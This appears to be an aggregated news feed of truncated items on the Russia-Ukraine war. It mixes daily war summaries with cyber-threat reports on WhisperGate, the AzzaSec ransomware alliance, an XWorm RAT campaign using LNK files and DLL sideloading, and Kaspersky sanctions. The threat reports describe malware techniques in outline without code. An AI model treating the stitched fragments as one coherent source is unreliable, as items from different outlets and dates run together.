Infant among six injured, with at least one dead and more trapped in building in central Ukraine; 10 Ukrainian civilians freed from Russia and Belarus jails in Vatican-mediated deal. What we know on day 857

• See all our Ukraine war coverage

A Russian missile strike hit a nine-storey residential building in the central Ukrainian city of Dnipro on Friday, killing at least one person and injuring six others, officials said. The death toll would likely rise as more people remained trapped in the building, where four upper storeys collapsed as a result of the attack, said the interior minister, Ihor Klymenko. A photo posted on Telegram by the governor, Serhiy Lysak, and other images on social media showed a badly damaged building that had smoke rising from a gaping hole in its upper storeys. A seven-month-old infant was among the injured, Lysak said. Three people were in severe condition.

Volodymyr Zelenskiy said 10 civilians including a politician and two priests taken prisoner in Russia and Belarus had been freed in a deal mediated by the Vatican. Russia and Ukraine have exchanged hundreds of prisoners throughout their two-year conflict but the release of civilian prisoners is rarer. “We managed to return 10 more of our people from Russian captivity,” the Ukrainian president said on Telegram. It was not immediately clear if the release was part of an exchange deal involving Russian prisoners held in Ukraine. Some of those released had been in prison since 2017, he said, arrested in Russian-controlled parts of eastern Ukraine that at the time were run by Moscow-backed separatists.

Russia’s defence ministry claimed its forces had taken control of the settlement of Rozdolivka in eastern Ukraine, but the Ukrainian military said heavy fighting was raging in areas around the settlement. The Russian ministry said on Friday that Russia’s “southern” military grouping had taken up what it called more favourable positions after pushing Ukrainian forces out of the settlement. Rozdolivka is in the Donetsk region, the focal point of Russia’s slow advance across eastern Ukraine. It lies north of Bakhmut and Soledar, two localities brought under Russian control last year.

The Ukrainian military’s general staff said Russian forces had launched 19 attacks in a broad sector that included Rozdolivka. “Our soldiers resolutely held their defences and repelled 15 of the assaults,” the evening report on Friday said. “Four armed confrontations are continuing.” The battlefield accounts from either side could not be verified.

The Biden administration will provide Ukraine with $150m worth of weapons and ammunition, including Hawk air defence interceptors and 155mm artillery munitions, two US officials said. The weapons aid package was expected be unveiled on Monday, they said on Friday, declining to be named. The administration is responding to Ukraine’s desperate requests for air defence support as Russia has pounded Ukrainian energy facilities in recent weeks via aerial attacks.

Vladimir Putin said Russia should start producing short- and intermediate-range missiles that were previously banned under a now-defunct arms treaty with the US. The Russian president was referring to missiles with a range of 500 to 5,500km (300-3,400 miles) that were banned under the cold war-era intermediate-range nuclear forces (INF) treaty. Washington withdrew from the deal in 2019, citing Russia’s failure to comply. The Kremlin said at the time that it would abide by a moratorium on production if the US did not deploy missiles within striking distance of Russia. In a televised address to his top security officials on Friday, Putin said the US had started using such missiles in training exercises in Denmark and “we need to react to this”.

Russia’s defence minister has ordered officials to prepare a “response” to US drone flights over the Black Sea, the ministry said, in an apparent warning that Moscow may take forceful action to ward off the American reconnaissance aircraft. The Russian defence ministry noted a recent “increased intensity” of US drones over the Black Sea, saying they “conduct intelligence and targeting for precision weapons supplied to the Ukrainian military by western countries for strikes on Russian facilities”.

The International Monetary Fund’s executive board has voted to approve a $2.2bn payout for Ukraine under an existing loan programme, and lowered its growth outlook following “devastating” Russian attacks against the country’s energy infrastructure. The much-needed funds would be used for “budget support” and bring the total amount disbursed under the 48-month loan agreement to about $7.6b, the IMF said on Friday.

Continue reading...

💾

© Photograph: Mykola Synelnykov/Reuters

💾

© Photograph: Mykola Synelnykov/Reuters

War in Gaza, a failed coup in Bolivia, protests in Nairobi and Taylor Swift at Wembley: the last seven days as captured by the world’s leading photojournalists

Continue reading...

💾

© Photograph: Luis Tato/AFP/Getty Images

💾

© Photograph: Luis Tato/AFP/Getty Images

Shockwaves from the Russian government's hack of Microsoft's corporate infrastructure continue to spread as the victim pool widens.

The post Microsoft Alerts More Customers to Email Theft in Expanding Midnight Blizzard Hack appeared first on SecurityWeek.

TeamViewer’s corporate network was hacked and some reports say the Russian group APT29 is behind the attack.

The post Russian APT Reportedly Behind New TeamViewer Hack appeared first on SecurityWeek.

Critics fear Kallas’s unyielding nature makes her the wrong fit to succeed Josep Borrell but allies admire her strength and clarity

Kaja Kallas will be giving up a lot to return to Europe to succeed Josep Borrell as the EU’s foreign policy chief.

Her 18th-century offices at the top of the picturesque old town in Tallinn marry elegance with efficiency, with the neoclassical cabinet chamber capable of projecting business papers on to the wall. Outside there is a balcony on the edge of Toompea hill where Kallas sometimes sits, with glorious views over the town and the Gulf of Finland.

Continue reading...

💾

© Photograph: Geert Vanden Wijngaert/AP

💾

© Photograph: Geert Vanden Wijngaert/AP

The six US astronauts aboard International Space Station rush to their spacecrafts in case of emergency departure

A defunct Russian satellite has broken up into nearly 200 pieces of debris in orbit, forcing astronauts on the International Space Station to take shelter for about an hour and adding to the mass of space junk already in orbit, US space agencies said.

There were no immediate details on what caused the breakup of the Resurs-P1 Russian Earth observation satellite, which Russia declared dead in 2022.

Continue reading...

💾

© Photograph: Nasa/AP

💾

© Photograph: Nasa/AP

The US Justice Department has announced charges against Amin Stigal for conducting wiper cyberattacks on Ukraine in 2022.

The post US Announces Charges, Reward for Russian National Behind Wiper Attacks on Ukraine appeared first on SecurityWeek.

The cause of the incident, which added to a growing amount of dangerous space junk in low Earth orbit, remains unknown.

© Alexander Blinov/Alamy

Ukrainian president signs military agreement with EU and says ‘fulfilment of every promise’ of support is important

Ukraine’s president, Volodymyr Zelenskiy, has told EU leaders that Russia’s spring offensive in Kharkiv showed that international pressure on the Kremlin was “not enough”, as he signed a military agreement with the bloc.

Vladimir Putin had tried to “expand the war” in May with a new offensive in eastern Ukraine, Zelenskiy said on Thursday, referring to relentless attacks on the Kharkiv region.

Continue reading...

💾

© Photograph: Olivier Hoslet/Reuters

💾

© Photograph: Olivier Hoslet/Reuters

Amidst the ongoing Russo-Ukrainian war, hackers from Italy have decided to join forces with an infamous cyber attacker group in Russia. Azzasec is an Italian hacktivist group who has been involved in anti-Israel campaigns and has teamed up with the infamous pro-Russian hacktivists Noname057(16). Azzasec has a large network of partner groups, whereas Noname05716 is selective in their allies. The alliance between these two nefarious groups signifies a potential increase in the scale and sophistication of cyberattacks on Ukraine and its allies.

Understanding the AzzaSec Ransomware

On June 26, 2024, NoName formally announced on its social media channels about the alliance. “Today we have formed an alliance with the Italian hacker group AzzaSec, which is one of the TOP 3 coolest hack teams in Italy! We are always open to cooperation with various trance around the world!” the post read. [caption id="attachment_79189" align="alignnone" width="837"] Source: X[/caption] AzzaSec is an infamous actor that infects computers and encrypts files. It later demands a ransom for its decryption. Once a computer is infected, AzzaSec assigns the '.AzzaSec' extension to the filenames. It alters files such as '1.png' to '1.png.AzzaSec' and '2.pdf' to '2.pdf.AzzaSec.' Additionally, it changes the desktop wallpaper and provides a ransom note via a pop-up window like the screenshot below. [caption id="attachment_79190" align="alignnone" width="1828"] Source: X[/caption] The group demands ransom through Bitcoin. AzzaSec’s sophisticated encryption techniques and the secrecy of cryptocurrency transactions make it increasingly difficult for authorities to crackdown and defuse the cybercriminals. AzzaSec recently announced the release of a Windows ransomware builder. The group claimed that their ransomware could bypass major antivirus solutions such as Windows 10 / 11 Defender, Avast, Kaspersky, and AVG. AzzaSec’s emergence into the ransomware scene signals a reminder for organizations and individuals alike to upgrade their cybersecurity measures and remain vigilant against online threats.

Inglorious Past of NoName

NoName057(16) , on the other hand,  first emerged in March 2022 and is known for its cyber-attacks on Ukrainian, American, and European government agencies, media, and private companies. The group is considered one of the biggest unorganised and free pro-Russian activist group. Renowned for its widespread cyber operations, NoName057(16) has garnered notoriety for developing and distributing custom malware, notably the DDoS attack tool, the successor to the Bobik DDoS botnet. [caption id="attachment_79192" align="alignnone" width="1280"] Source: X[/caption] According to a report by Google-owned Mandiant, NoName057(16), along with other Russian state hackers, pose the biggest cyber threat to elections in regions with Russian interest. “Mandiant is tracking multiple self-proclaimed hacktivist groups primarily conducting DDoS attacks and leaking compromised data in support of Russian interests. These groups claim to have targeted organizations spanning the government, financial services, telecommunications, transportation, and energy sectors in Europe, North America, and Asia; however, target selection and messaging suggests that the activity is primarily focused on the conflict in Ukraine. Relevant groups include KillNet, Anonymous Sudan, NoName057(16), JokerDNR/DPR, Beregini, FRwL_Team (aka "From Russia with Love"), and Moldova Leaks,” Google stated in its threat intelligence report in April. The alliance between AzzaSec and NoName057(16) raises serious concerns about the evolving cyber threat landscape. With a combined skillset for ransomware deployment and large-scale attacks, these groups pose a significant risk to organizations and governments aligned with Ukraine. As the Russo-Ukrainian war rages on, the digital front is likely to see further escalation in cyberattacks.  It is crucial for targeted nations and organizations to bolster their cybersecurity defenses, implement robust incident response plans, and collaborate on international efforts to counter these cyber threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Justice department announces $10m reward for information on 22-year-old Amin Timovich Stigal, who remains at large. What we know on day 855

A Russian has been charged with conspiring to hack and destroy computer systems and data in Ukraine and allied countries including the US, the US justice department said on Wednesday, and announced a $10m reward for information. Before the invasion of Ukraine in February 2022, Amin Timovich Stigal, 22, who remains at large, targeted Kyiv’s government systems and data with no military-related role, the department alleged. Computer systems in the US and other countries that provided support to Ukraine were targeted later, it alleged.

Wall Street Journal reporter Evan Gershkovich went on trial behind closed doors in Ekaterinburg on Wednesday, 15 months after his arrest in the Russian city on espionage charges that he, his employer and the US government vehemently deny. The 32-year-old was arrested in March 2023, while on a reporting trip to Ekaterinburg, in the Ural Mountains, with authorities claiming without offering any evidence that he was gathering secret information for the US.

The EU is expected to sign a security agreement with Ukrainian President Volodymyr Zelenskiy on Thursday, pledging to keep delivering weapons, military training and other aid to Kyiv for years to come. The agreement will lay out the EU’s commitment to help Ukraine in nine areas of security and defence policy – including arms deliveries, military training, defence industry cooperation and demining, according to a draft seen by Reuters.

European Union countries agreed a sanctions package against Belarus on Wednesday, EU diplomats and Belgium said, to try to close off a route to avoiding restrictions on Russia. “This package will strengthen our measures in response to Russia’s invasion of Ukraine, including combating circumvention of sanctions,” Belgium, which holds the EU presidency until the end of June, said on X.

President Volodymyr Zelenskiy made an unannounced visit to the Donetsk region in eastern Ukraine to bolster morale among troops, amid continuing advances by Russian forces. The Ukrainian president recorded a video address against the backdrop of Pokrovsk, a city with a prewar population of about 61,000 that has experienced some of the most intense fighting during the 28-month-long full-scale invasion. Zelenskiy made the trip alongside Brig Gen Andriy Hnatov, the newly appointed commander of the joint forces.

During the visit, Zelenskiy signalled that he was getting tough on officials he suspects are shirking their duties. He said that back in Kyiv he would speak to “officials who must be here and in other areas near the frontline – in difficult communities where people need immediate solutions.” He continued: “I was surprised to learn that some relevant officials have not been here for six months or more. There will be a serious conversation, and I will draw appropriate conclusions regarding them.”

Five Lithuanians were wounded when they came under fire in eastern Ukraine as they delivered aid to troops, officials and team members said Wednesday. The volunteer workers were in a car that was shelled on Monday in Pokrovsk in Ukraine’s Donetsk region, a colleague Valdas Bartkevicius told AFP. The region’s governor reported that five people were killed and dozens wounded in Russian strikes on Pokrovsk on Monday.

Representatives of Russia’s and Ukraine’s human rights offices held a meeting for the first time during an exchange of prisoners of war on Tuesday, Kyiv said. The two countries each released 90 captured soldiers in a deal brokered by the United Arab Emirates, the latest in more than 50 prisoner exchanges that have taken place throughout the war. But it was the first time Russia had agreed to hold a direct meeting between human rights representatives during the exchange, Ukraine’s human rights commissioner Dmytro Lubinets told AFP.

Nato’s 32 nations on Wednesday appointed outgoing Dutch prime minister Mark Rutte as the alliance’s next head. Rutte will take over from secretary general Jens Stoltenberg on 1 October after major powers – spearheaded by the US – wrapped up his nomination ahead of a summit of Nato leaders in Washington next month.

Continue reading...

💾

© Photograph: Anadolu Agency/Getty Images

💾

© Photograph: Anadolu Agency/Getty Images

A U.S. grand jury has indicted a Russian citizen, Amin Timovich Stigal, for allegedly conspiring with Russia's military intelligence agency (GRU) to launch cyberattacks crippling Ukrainian government systems and data ahead of Russia's full-scale invasion in February 2022.

The indictment, unsealed yesterday in Maryland, sheds light on a coordinated effort to disrupt critical Ukrainian infrastructure and sow panic among the population.

“As alleged, the defendant conspired with Russian military intelligence on the eve of Russia’s unjust and unprovoked invasion of Ukraine to launch cyberattacks targeting the Ukrainian government and later targeting its allies, including the United States.” - Attorney General Merrick B. Garland

Attacker Aimed for 'Complete Destruction' in Cyberattacks Targeting Ukraine

Stigal, 22, who remains at large, was charged for his alleged role in using a deceptive malware strain called "WhisperGate" to infiltrate dozens of Ukrainian government networks, including ministries, state services, and critical infrastructure entities. Disguised as ransomware, WhisperGate reportedly went beyond data encryption, aiming for complete destruction of targeted systems and data.

The attacks coincided with the defacement of Ukrainian websites displaying threatening messages designed to intimidate the public. Sensitive data, including patient health records, was exfiltrated and offered for sale online, further amplifying the chaos.

U.S. Critical Infrastructure Targeted Too

But the malicious campaign wasn't limited to cyberattacks targeting Ukraine. The indictment broadens the scope beyond Ukraine, revealing attempts to probe U.S. government networks in Maryland using similar tactics.

“These GRU actors are known to have targeted U.S. critical infrastructure. During these malicious cyber activities, GRU actors launched efforts to scan for vulnerabilities, map networks, and identify potential website vulnerabilities in U.S.-based critical infrastructure – particularly the energy, government, and aerospace sectors.” - Rewards for Justice

The scope of the malicious campaign highlights the potential wide-ranging objectives of the GRU cyber campaign and the ongoing threat posed by nation-state actors.

Reward Offered for Info Leading to Capture

The Justice Department emphasized its commitment to holding accountable those responsible for Russia's malicious cyber activity. The indictment carries a maximum sentence of five years, but international cooperation remains crucial to apprehend Stigal.

The U.S. Department of State's Rewards for Justice program is offering a significant reward – up to $10 million – for information leading to Stigal's capture or the disruption of his cyber operations. This substantial reward underscores the seriousness of the charges and the international effort to dismantle Russia's cyber warfare apparatus.

This case serves as a stark reminder of the evolving cyber threat landscape. The destructive capabilities of malware like WhisperGate, coupled with the targeting of critical infrastructure necessitates vigilance and collaboration between governments and security professionals to defend against nation-state cyberattacks.

“Malicious cyber actors who attack our allies should know that we will pursue them to the full extent of the law,” said Erek L. Barron, U.S. Attorney for the District of Maryland. “Cyber intrusion schemes such as the one alleged threaten our national security, and we will use all the technologies and investigative measures at our disposal to disrupt and track down these cybercriminals.”

Who is Amin Stigal?

The U.S. linked 22-year-old Amin Stigal to the Russian GRU and labelled him for his involvement in the WhisperGate malware operations. But who is Amin Stigal and what is the extent of his involvement? [caption id="attachment_79079" align="aligncenter" width="947"] Source: Rewards for Justice[/caption] The U.S. authorities, along with the $10 million bounty, released scarce but very important details on Stigal's cyber trail - his aliases or the threat group names with whom he is affiliated. The Cyber Express did an open-source intelligence (OSINT) study on these aliases and found the following details on Amin Stigal's cyber activities:

DEV-0586/Cadet Blizzard

Microsoft first tracked this threat actor as DEV-0586 and observed its destructive malware targeting Ukrainian organizations in January 2022. The tech giant later in April 2023 shifted to a new threat actor-naming taxonomy and thus named the TA "Cadet Blizzard." Cadet Blizzard has been operational since at least 2020 and has initiated a wave of destructive wiper attacks against Ukraine in the lead up to Russia's February 2022 invasion of Ukraine. Specifically, it created and developed WhisperGate, a wiper that deletes the master boot record, Microsoft said.

EMBER BEAR

Crowd Strike tracked this threat actor as EMBER BEAR (aka Lorec Bear, Bleeding Bear, Saint Bear) and linked it to an adversary group that has operated against government and military organizations in eastern Europe since early 2021. The likely motive of this TA is to collect intelligence from target networks, the cybersecurity firm said. EMBER BEAR primarily weaponized the access and data obtained during their intrusions to support information operations (IO), according to CrowdStrike. Their aim in employing this tactic was to create public mistrust in targeted institutions and degrade respective government's ability to counter Russian cyber operations.

UAC-0056

The Computer Emergency Response Team of Ukraine tracked this Russian-linked threat actor/group as UAC-0056 and observed its malicious campaigns targeting Ukraine through phishing campaigns in July 2022. In the discovered attack, threat actors sought to disrupt the integrity and availability of government websites by exploiting several backdoors and deploying Cobalt Strike Beacon malware. The threat actors communicated with the web shell using IP addresses, including those belonging to neighboring devices of other hacked organizations due to their previous account abuse and additional VPN connection to the corresponding organizations. The hackers also applied other malware samples in this campaign including the GOST (Go Simple Tunnel) and Ngrok utilities, to deploy the HoaxPen backdoor.

What is WhisperGate Malware?

WhisperGate is a destructive malware that is seemingly designed like a ransomware, but it is not. Unlike ransomware, which encrypts data and demands a ransom for decryption, WhisperGate aimed to completely destroy data, rendering the infected systems inoperable. It first targeted Ukrainian organizations in January 2022 and ever since continues to remain on the list of top malware variants used to target Kyiv.

Key Points on WhisperGate:

• Multi-stage Attack: It operated in stages, with the first stage overwriting the Master Boot Record (MBR) to prevent the system from booting normally and displaying a fake ransom note.
• Data Wiping: The MBR overwrite made data recovery nearly impossible.
• Motive: Experts believe the goal was data destruction, not financial gain, due to the lack of a real decryption method.
• Deployment: The malware resided in common directories like C:\PerfLogs and used a publicly available tool called Impacket to spread laterally within networks.

Some expressed concern about a rise in hybrid attacks by Russia – including allegations of election interference, cyberattacks and sabotage.

The post The EU Targets Russia’s LNG Ghost Fleet With Sanctions as Concern Mounts About Hybrid Attacks appeared first on SecurityWeek.

Cyble Research and Intelligence Labs (CRIL) researchers have observed the Russia-linked threat actor group UAC-0184 targeting Ukraine with the XWorm remote access trojan (RAT) through the use of Python-related files.

Technical Overview of XWorm RAT Campaign

The campaign begins with a malicious LNK shortcut file, disguised as a legitimate Excel document, which executes a PowerShell script upon execution. The script downloads two files, "pkg.zip" and "NewCopy.xlsx", from a specified URL. The LNK shortcut file then executes "pythonw.exe" using the start command, which duplicates files and stores them in a new folder. The "pythonw.exe" loads a malicious DLL, "python310.dll", through DLL sideloading, injecting shellcode into the MSBuild process. [caption id="attachment_78917" align="alignnone" width="1529"] Source: Cyble[/caption] The hackers use a technique called DLL sideloading, where a malicious library file masquerades as a legitimate one. This allows the attackers to run their code under the guise of trusted software. Additionally, they employ a tool called Shadowloader to inject the XWorm RAT into a running process, further obscuring its presence. The XWorm RAT is then executed, offering a range of capabilities, including data theft, DDoS attacks, and cryptocurrency address manipulation. The malware attempts to connect to a Command-and-Control (C&C) server, but at the time of analysis, the server was inactive, resulting in no observed malicious activities. [caption id="attachment_78919" align="alignnone" width="537"] Source: Cyble[/caption] While the initial infection vector remains unclear, researchers suspect phishing emails may play a role. The intended victim could not be ascertained from accessing the the Excel lure used in the campaign. CRIL researchers had previously observed the UAC-0184 threat actor group employing lures tailored to appeal to Ukrainian targets, often mimicking official government or utility communications.

Protecting Against XWorm RAT

The XWorm RAT malware employed in the campaign is designed to be easily accessible even to to threat actors lacking sophistication and technical expertise. The versatile malware offers several functionalities, including data theft, DDoS attacks, cryptocurrency address manipulation, ransomware deployment, and downloading additional malware onto compromised systems. Cyble researchers have recommended several measures to defend against this campaign:

• Implement strong email filtering to block malicious attachments.
• Exercise caution with email attachments, especially from unknown senders.
• Limit execution of scripting languages where possible.
• Use application whitelisting to control which programs can run.
• Deploy robust antivirus and anti-malware solutions.
• Enforce strong, unique passwords and two-factor authentication.
• Monitor networks for unusual activity or data exfiltration attempts.

The campaign demonstrates UAC-0184's relentless efforts at attacking Ukraine with evasive techniques. The use of the XWorm RAT as the final payload indicates the intent to establish remote access over compromised systems for strategic purposes. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The European Council has added six Russian hackers to the EU’s sanctions list for their cyberattacks against member states and Ukraine.

The post EU Sanctions Six Russian Hackers appeared first on SecurityWeek.

A day after the Biden administration announced a U.S. ban on the sale of Kaspersky Lab products, the U.S. Treasury Department on Friday sanctioned a dozen top executives and senior leaders at the Russian cybersecurity company. Kaspersky took issue with the Biden administration's moves and said, "The decision does not affect the company’s ability to sell and promote cyber threat intelligence offerings and/or trainings in the U.S." The company said the action will instead benefit cybercriminals by restricting international cooperation between cybersecurity experts. The decision to ban Kaspersky is "based on the present geopolitical climate and theoretical concerns," the company said in a scathing response to the Commerce Department's ban. The sanctions represent the latest in a series of punitive measures against the Russian antivirus company, underscoring growing concerns about cybersecurity and national security risks associated with the firm's operations.

Details of the Kaspersky Sanctions

The Treasury Department’s Office of Foreign Assets Control (OFAC) specifically targeted key individuals within Kaspersky Lab, including the chief operating officer, chief legal officer, chief of human resources, and chief business development and technology officers, among others. [caption id="attachment_78565" align="aligncenter" width="588"] Source: U.S. Department of the Treasury[/caption] The Treasury added all the above individuals to its Specially Designated Nationals list. SDN is a list maintained by OFAC that publicly identifies persons determined by the U.S. government to be involved in activities that threaten or undermine U.S. foreign policy or national security objectives. Notably, the sanctions did not extend to Kaspersky Lab itself, its parent or subsidiary companies nor to its CEO Eugene Kaspersky. The sanctions came just a day after the U.S. Commerce Department issued a final determination to ban Kaspersky Lab from operating in the United States. This ban is rooted in longstanding concerns over national security and the potential risks to critical infrastructure. The Commerce Department also added three Kaspersky divisions to its entity list due to their cooperation with the Russian government in cyber intelligence activities. The U.S. government has been wary of Kaspersky Lab's ties to the Russian government, fearing that its software could be used to facilitate cyber espionage. Bloomberg in 2017 first reported it had seen emails between chief executive Eugene Kaspersky and senior Kaspersky staff outlining a secret cybersecurity project apparently requested by the Russian intelligence service FSB. Kaspersky refuted these claims, calling the allegations "false"  and "inaccurate." However, these concerns have led to a broader push to restrict the company's operations within the U.S. and to mitigate any potential threats to national security.

Kaspersky Lab’s Response

Kaspersky Lab has consistently denied any allegations of being influenced or controlled by any government. The company has pledged to explore all legal options in response to the Commerce Department’s ban and the recent sanctions imposed by the Treasury. In a statement, Kaspersky Lab reiterated its commitment to transparency and maintaining the trust of its users worldwide, emphasizing it has never assisted any government in cyber espionage activities. "Kaspersky does not engage in activities which threaten U.S. national security and, in fact, has made significant contributions with its reporting and protection from a variety of threat actors that targeted U.S. interests and allies," it said.

"Kaspersky provides industry-leading products and services to customers around the world to protect them from all types of cyber threats, and has repeatedly demonstrated its independence from any government." - Kaspersky Lab

The antivirus company claimed it has also implemented significant transparency measures that demonstrate its commitment to integrity and trustworthiness. But "the Department of Commerce’s decision unfairly ignores the evidence," Kaspersky said. The company said it also proposed a system in which the security of Kaspersky products could have been independently verified by a trusted third party.

"Kaspersky believes that the Department of Commerce made its decision based on the present geopolitical climate and theoretical concerns, rather than on a comprehensive evaluation of the integrity of Kaspersky’s products and services."

However, Brian Nelson, Treasury’s Undersecretary for Terrorism and Financial Intelligence, stated, “Today’s action against the leadership of Kaspersky Lab underscores our commitment to ensure the integrity of our cyber domain and to protect our citizens against malicious cyber threats. The U.S. will take action where necessary to hold accountable those who would seek to facilitate or otherwise enable these activities.”

Implications and Future Actions

The sanctions against Kaspersky Lab’s leadership signal a broader strategy by the U.S. government to address cybersecurity threats posed by foreign entities. This approach is part of a larger effort to strengthen national security and protect critical infrastructure from potential cyberattacks.

Legal and Business Repercussions

Kaspersky Lab’s legal battles and its efforts to counteract these sanctions will be closely watched. The company's ability to operate in the international market could be significantly affected by these measures, impacting its business operations and customer trust.

Global Cybersecurity Landscape

This development also highlights the ongoing tensions in the global cybersecurity landscape, where national security concerns often intersect with business interests. The actions taken by the U.S. government may set a precedent for how other nations address similar concerns with foreign technology firms. The U.S. Treasury Department's decision to sanction senior leaders at Kaspersky Lab marks a pivotal moment in the ongoing scrutiny of the Russian cybersecurity firm. While Kaspersky Lab denies any wrongdoing and prepares to contest the sanctions legally, the actions taken by the U.S. government underscore a determined effort to mitigate potential cyber threats and protect national security. As the situation unfolds, it will have significant implications for both Kaspersky and the broader cybersecurity environment.

A round-up of links inside on the Russia-Ukraine war. Today is day 848 of the invasion.

Russia: Russia wages a scorched-earth war in Ukraine with retrofitted bombs and new airstrips (AP) Fire at drone-hit Russian oil depot rages for second day (Reuters) Putin accuses NATO of creating a security threat for Russia in Asia (Reuters) China: Outgoing NATO chief says China should face consequences for backing Russia's war on Ukraine (CBC) Ukraine peace summit is a 'success', China key to ending war: ambassador to Singapore (South China Morning Post) China lobbying for its alternative peace plan ahead of Ukraine's summit, Reuters reports (Kyiv Independent) EU: EU passes 14th sanctions package in first major move against Russian gas (Kyiv Independent) Romania to send Patriot defense system to Ukraine (Kyiv Independent) EU envoys agree on more Russia sanctions. LNG imports are among the targets. (AP) Japan: Signing of the Accord on Support for Ukraine and Cooperation between the Government of Japan and Ukraine (Ministry of Foreign Affairs of Japan) Japan to finance US$188 million technology transfer to Ukrainian business (MSN) North & South Korea: Russia and North Korea sign mutual defence pact: Vladimir Putin and Kim Jong-un's agreement raises western alarm about possible Russian help for nuclear programme (Guardian) What's known, and not known, about the partnership agreement signed by Russia and North Korea (AP) Putin says South Korea would be making 'a big mistake' if it supplies arms to Ukraine (Reuters) Ukraine: Russian troops fail to advance as Ukraine garners military, financial aid (Al Jazeera) Ukraine, Russia targeting each other's energy infrastructure (NHK World Japan) Ukraine launches a national sexual assault registry for victims of Russian forces (CTV) USA: US to focus on deepening ties with Vietnam after Putin's Hanoi visit (Reuters) Exclusive: Biden to ban US sales of Kaspersky software over Russia ties, source says (Reuters) White House confirms Ukraine to get priority on air defense missile deliveries (Kyiv Independent; post title is a Biden quote from this article) Aid: Fidelity Charitable list of organizations; UNICEF; Support Sellers in Ukraine

A pair of whales were extricated from the besieged city of Kharkiv and taken to an aquarium in Spain with help from experts around the world.

© via Oceanogràfic de Valencia

Ukraine’s Security Service (SBU) detained two individuals accused of aiding Russian intelligence in hacking the phones of Ukrainian soldiers and spreading pro-Kremlin propaganda. The suspects operated bot farms using servers and SIM cards to create fake social media accounts. One bot farm in the Zhytomyr Oblast was hosted in an apartment of a Ukrainian woman. She allegedly registered over 600 virtual mobile numbers and several anonymous Telegram accounts.

Russian Intelligence Installed Spyware in Campaign

The woman sold or rented these accounts in exchange for cryptocurrency on online Russian underground marketplaces. Russian intelligence used these accounts and numbers to hack phones of Ukrainian military personnel by sending phishing emails containing spyware that collected sensitive confidential data. Russian hackers were recently observed using legitimate remote monitoring and management (RMM) software to spy on Ukraine and its allies. [caption id="attachment_77338" align="aligncenter" width="1024"] Source: SBU[/caption] According to the SBU, the accounts hosted on this bot farm were also used to spread pro-Kremlin propaganda purporting as ordinary Ukrainian citizens. Another 30-year-old man from Dnipro allegedly registered nearly 15,000 fake accounts on various social networks and messaging platforms using Ukrainian SIM cards. He sold these accounts to Russian intelligence services on darknet forums. [caption id="attachment_77337" align="aligncenter" width="1024"] Source: SBU[/caption] Both suspects face up to three years in prison or a fine if found guilty. The investigation continues.

Russian Bot Farms Used Since Invasion Started

Russia has used bot farms to disseminate Kremlin propaganda, incite panic and manipulate narratives since the beginning of its Ukrainian invasion. The Ukrainian authorities have busted dozens of bot farms and arrested hundreds of people across the country who operate them. In December 2022, they dismantled more than a dozen bot farms. In September of that year, two bot farms were taken down, while in August a group that operated more than 1 million bots was also dismantled. Bot farm operators typically receive payments in Russian rubles, a prohibited currency in Ukraine. These activities continued in the second year of the war, where the Ukrainian Cyber Police raided 21 locations across the country and seized computer equipment, mobile phones and more than 250 GSM gateways. This included 150,000 SIM cards of different mobile operators used in the illicit activities to create fake social media profiles.

Read 30 remaining paragraphs | Comments

Ukraine National Police have arrested a man they say helped disguise ransomware used by Russia-based threat groups. The 28-year-old cryptor developer was unnamed in Ukraine and Netherlands announcements of the arrest, but the Dutch statement said he was arrested on April 18, 2024 in a lead-up to May’s massive “Operation Endgame” botnet takedown.

Cryptor Developer Worked with Conti, LockBit

Ukraine cyber ​​police and National Police investigators say they established that the man was involved in the LockBit and Conti ransomware groups. The Kyiv man infected a company in the Netherlands with Conti ransomware in 2021, demanded a ransom and threatened to release confidential company information if payment wasn’t made, according to the Dutch announcement, which cited work by the Netherlands’ High Tech Crime Team of the National Operations and Interventions Unit and the National Public Prosecution Service. They requested Ukraine’s assistance in the case as part of their investigation. As part of the arrest, Ukrainian police conducted house searches in the city of Kyiv and the Kharkiv region on April 18 and seized computer equipment, mobile phones and documents for further investigation (pictured below). [caption id="attachment_76895" align="alignnone" width="300"] Items seized in Ukraine ransomware arrest[/caption] The Ukraine cyber police said the man “specialized in the development of cryptors,” or “special software for masking computer viruses under the guise of safe files” (quotes translated from the Ukraine statement). “Thanks to his programming skills, the person involved was able to hide malicious software from the most popular antiviruses,” the Ukraine statement added.

LockBit Remains Active Despite Repeated Enforcement Activities

The Conti ransomware group reportedly dissolved in 2022 after a Ukrainian researcher leaked the group's source code in retaliation for the group's support of Russia's invasion of Ukraine, but LockBit has remained persistent. Despite the Ukraine arrest and law enforcement successes like Operation Endgame, Operation Cronos, and the unmasking of formerly anonymous LockBit leader Dmitry Khoroshev, LockBit has shown an ability to continually regroup and reestablish threat activities, recently launching high-profile ransomware attacks such as one that the city of Wichita is finally recovering from. Ukraine officials said the investigation is ongoing. The suspect is being charged under part 5 of Article 361, Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks, of the Criminal Code of Ukraine. The article provides for publishment of up to 15 years of imprisonment, and additional charges are possible. Netherlands officials thanked the Ukrainian investigators for their assistance and said they “are very pleased with the arrest in Ukraine and are grateful for the space that the Ukrainian police have found for this in times of war.”

Read 34 remaining paragraphs | Comments

Last week's EU parliamentary elections have resulted in big wins for right (and far-right) parties across the continent, with inflation- and migration-driven campaigns seeing late surges in support from Giorgia Meloni's Brothers of Italy to Geert Wilder's Party of Freedom to the extremist (and Nazi-curious) Alternative for Germany. Most notable was the unprecedented success of Marine Le Pen's hard-right National Rally in France, whose demolition of the ruling centrist coalition was so complete that President Emmanuel Macron has unexpectedly dissolved the legislature and called for snap elections later this month in a high-stakes bid to disrupt the national-populist wave. Not all is grim for the left -- socialist parties held their own in multiple nations, proudly illiberal Viktor Orban's Fidesz fell short of projections against a rising Péter Magyar, and France's two-round system has reliably kept the far-right out of power. Still, this week's results have massive and troubling implications for climate change, Ukraine, and a swath of other critical issues.

Spy warez: Assistant director of the FBI’s Cyber Division Bryan Vorndran (pictured) might have the key to unscramble your files.

The post LockBit Victim? Ask FBI for Your Ransomware Key appeared first on Security Boulevard.

Google and Microsoft warn of elevated risks of cyber threats facing the 2024 Paris Olympics, especially from Russian threat actors.

The post Google, Microsoft: Russian Threat Actors Pose High Risk to 2024 Paris Olympics appeared first on SecurityWeek.

